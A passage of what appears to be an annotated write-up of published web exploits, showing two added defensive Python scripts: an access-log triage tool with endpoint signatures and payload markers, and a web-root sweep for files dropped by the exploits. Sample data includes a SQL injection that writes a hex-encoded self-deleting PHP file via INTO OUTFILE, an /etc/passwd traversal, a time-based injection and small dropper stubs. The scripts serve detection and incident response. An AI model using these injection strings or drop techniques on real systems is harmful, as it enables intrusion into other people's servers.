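    ("190", r"/admin/Userinfo/poihuoqu"),
    ("191", r"/NavigationAjax\b"),
    ("192", r"/JoinfApp/EMail/UploadEmailAttr\?name=\.ashx"),
    ("193", r"/master/ajaxActions/setSystemTimeAction\.php"),
    ("194", r"/servlet/uploadAttachmentServlet"),
    ("195", r"/send_order\.cgi\?parameter=operation"),
    ("196", r"/cas/userCtl/resetPasswordBySuper"),
    ("197", r"/entsoft/Quotegask_editAction\.entweb"),
    ("198", r"/aliyundrive-webdav/query\?sid=.*`"),
    ("199", r"/assetsmanager/upload"),
    ("200", r"/dmplayer/dmku/\?.*sleep\("),
    ("201", r"/newsedit/newsplan/task/binary\.do"),
    ("202", r"/User/AccountEdit\.aspx"),
    ("203", r"/RedseaPlatform/PtFjk\.mob\?method=upload"),
]

# Injection / traversal fragments used by the PoCs above, checked on the lowercased target
PAYLOAD_MARKERS = ["sleep(", "waitfor delay", "into outfile", "union all select",
                   "randomblob(", "file:///", "/etc/passwd", "../", "..\\", "`", "os.system("]

UNHEX_RE = re.compile(r"unhex\('([0-9a-f]+)'\)", re.I)
OUTFILE_RE = re.compile(r"into outfile '([^']+)'", re.I)


def decode_outfile_payload(decoded_target):
    """Entry 185 writes unhex(<hex>) INTO OUTFILE <path>; return what lands on disk."""
    hex_m = UNHEX_RE.search(decoded_target)
    path_m = OUTFILE_RE.search(decoded_target)
    if not (hex_m and path_m):
        return None
    content = bytes.fromhex(hex_m.group(1)).decode("utf-8", errors="replace")
    return {"path": path_m.group(1), "content": content}


def triage_line(line):
    """Return a finding dict for a matching log line, None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, when, method, target, status = m.groups()
    decoded = unquote_plus(target)          # %27 -> ', + -> space, %5C -> backslash
    request = f"{method} {decoded}"
    entries = [n for n, pat in SIGNATURES if re.search(pat, request, re.I)]
    if not entries:
        return None
    low = decoded.lower()
    markers = [k for k in PAYLOAD_MARKERS if k in low]
    finding = {
        "src": src, "time": when, "method": method, "status": int(status),
        "entries": entries, "markers": markers, "decoded": decoded,
        # "payload": the attack string is visible in the request line itself.
        # "endpoint": only the path matched; POST bodies are not in an access log,
        # so confirm from application or WAF logs before acting on it.
        "level": "payload" if markers else "endpoint",
    }
    dropped = decode_outfile_payload(decoded)
    if dropped:
        finding["dropped_file"] = dropped    # tells the responder which file to look for
    return finding


def triage(lines):
    return [f for f in map(triage_line, lines) if f]


OUTFILE_HEX = ("3c3f706870206563686f206d643528223122293b202466696c65203d205f5f"
               "46494c455f5f3b20756e6c696e6b282466696c65293b")
SAMPLE_LOG = [  # constructed sample lines, not captured traffic
    '203.0.113.5 - - [10/May/2024:10:12:01 +0800] "GET /index.php?s=/Admin/appsave&appid=3%27%29%3B'
    'select+unhex%28%27' + OUTFILE_HEX + '%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot'
    '%5C%5Cplom.xgi%27%23 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [10/May/2024:10:12:05 +0800] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/May/2024:10:13:40 +0800] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/May/2024:10:14:00 +0800] "POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1" 200 77 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/May/2024:10:14:02 +0800] "GET /RedseaPlatform/index.jsp HTTP/1.1" 200 3020 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f["level"], f["entries"], f["src"], f["decoded"][:80])
```

A "payload" finding has the injection or traversal string in the request line itself; an "endpoint" finding only says that a vulnerable path was hit, which for the POST-based entries (uploads, JSON bodies) is all an access log can show, so confirm those from application or WAF logs. Search the output of the 185 decoder for the dropped path on the host: that file, or its access in the log, is the indicator even after it has unlinked itself.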
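A second added example, again not code from the original post: a sweep of a web root for the files the upload and INTO OUTFILE PoCs above leave behind (entries 185, 192, 194, 199, 202, 203) and for the marker file written by the entry 193 command check and the listing written by entry 198. It flags files by the exact paths published in those requests, by script extensions under an uploads directory, and by content fragments taken from the PoC payloads, so a dropped script with an unusual extension such as plom.xgi is still caught. The sample tree it builds is constructed; the directory names treated as upload directories and the size of the file head it inspects are assumptions.

```python
"""Sweep a web root for files dropped by the upload / INTO OUTFILE PoCs in this
section. Added example for defenders, not code from the original post.
build_sample_tree() creates a constructed directory tree for a dry run."""
import os
import re
import tempfile

# Paths written by the PoCs above, relative to the web root (or to / for the
# absolute ones); taken from the published requests, nothing added.
KNOWN_DROP_PATHS = {
    "WebRoot/plom.xgi",                                          # 185: INTO OUTFILE
    "jboss/web/fe.war/hello.jsp",                                # 194: traversal upload
    "storage/uploads/tttt.php",                                  # 199: Cockpit upload
    "_data/Uploads/1123.txt",                                    # 202: AccountEdit upload
    "www/aaa.txt",                                               # 198: backtick output
    "opt/var/majorsec/installation/master/runtime/img/config",   # 193: echo marker
}

# Content fragments from the PoC payloads above. A hit means "inspect", not
# "confirmed shell": genuine .ashx and .jsp sources also contain some of them.
CONTENT_MARKERS = [
    (re.compile(rb"<\?php[\s\S]{0,200}unlink\("), "php-self-deleting"),
    (re.compile(rb"<%\s*out\.print"), "jsp-print"),
    (re.compile(rb"<%@\s*WebHandler", re.I), "ashx-handler"),
    (re.compile(rb"<\?php"), "php-tag"),
]
SCRIPT_EXT = {".php", ".phtml", ".jsp", ".jspx", ".ashx"}
UPLOAD_DIRS = {"upload", "uploads"}        # assumption: typical upload directory names
HEAD_BYTES = 64 * 1024                     # assumption: markers sit at the start of a dropper


def classify(rel_path, head):
    """Return the reasons a file is suspicious, or [] if none apply."""
    reasons = []
    if rel_path in KNOWN_DROP_PATHS:
        reasons.append("known-drop-path")
    parts = rel_path.split("/")
    ext = os.path.splitext(parts[-1])[1].lower()
    if ext in SCRIPT_EXT and any(p.lower() in UPLOAD_DIRS for p in parts[:-1]):
        reasons.append("script-in-upload-dir")
    for pattern, label in CONTENT_MARKERS:
        if pattern.search(head):
            reasons.append(label)
    return reasons


def sweep(root):
    """Walk root and return [{'path': rel, 'reasons': [...]}] for flagged files."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            try:
                with open(full, "rb") as fh:
                    head = fh.read(HEAD_BYTES)
            except OSError:
                continue                    # unreadable file: skip, do not abort the sweep
            reasons = classify(rel, head)
            if reasons:
                findings.append({"path": rel, "reasons": reasons})
    return sorted(findings, key=lambda f: f["path"])


# Constructed sample tree: the dropper files from the PoCs above plus two benign files.
SAMPLE_FILES = {
    "WebRoot/plom.xgi": b'<?php echo md5("1"); $file = __FILE__; unlink($file);',
    "storage/uploads/tttt.php": b'<?php echo "tttt";unlink(__FILE__);?>',
    "jboss/web/fe.war/hello.jsp": b'<% out.println("hello");%>',
    "_data/Uploads/1123.txt": b"Hello World!",
    "uploads/avatar.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,
    "index.jsp": b'<%@ page contentType="text/html" %><html>ok</html>',
}


def build_sample_tree(root=None):
    """Write SAMPLE_FILES under root (a fresh temp dir if None) and return root."""
    root = root or tempfile.mkdtemp(prefix="webroot-")
    for rel, data in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(data)
    return root


if __name__ == "__main__":
    for f in sweep(build_sample_tree()):
        print(f["path"], ",".join(f["reasons"]))
```

Run sweep() against the real web root (and against / for the entry 193 and 198 paths) rather than the sample tree; a "known-drop-path" hit is a direct match to a published PoC, while "script-in-upload-dir" and the content labels need a look at the file before it is treated as a shell.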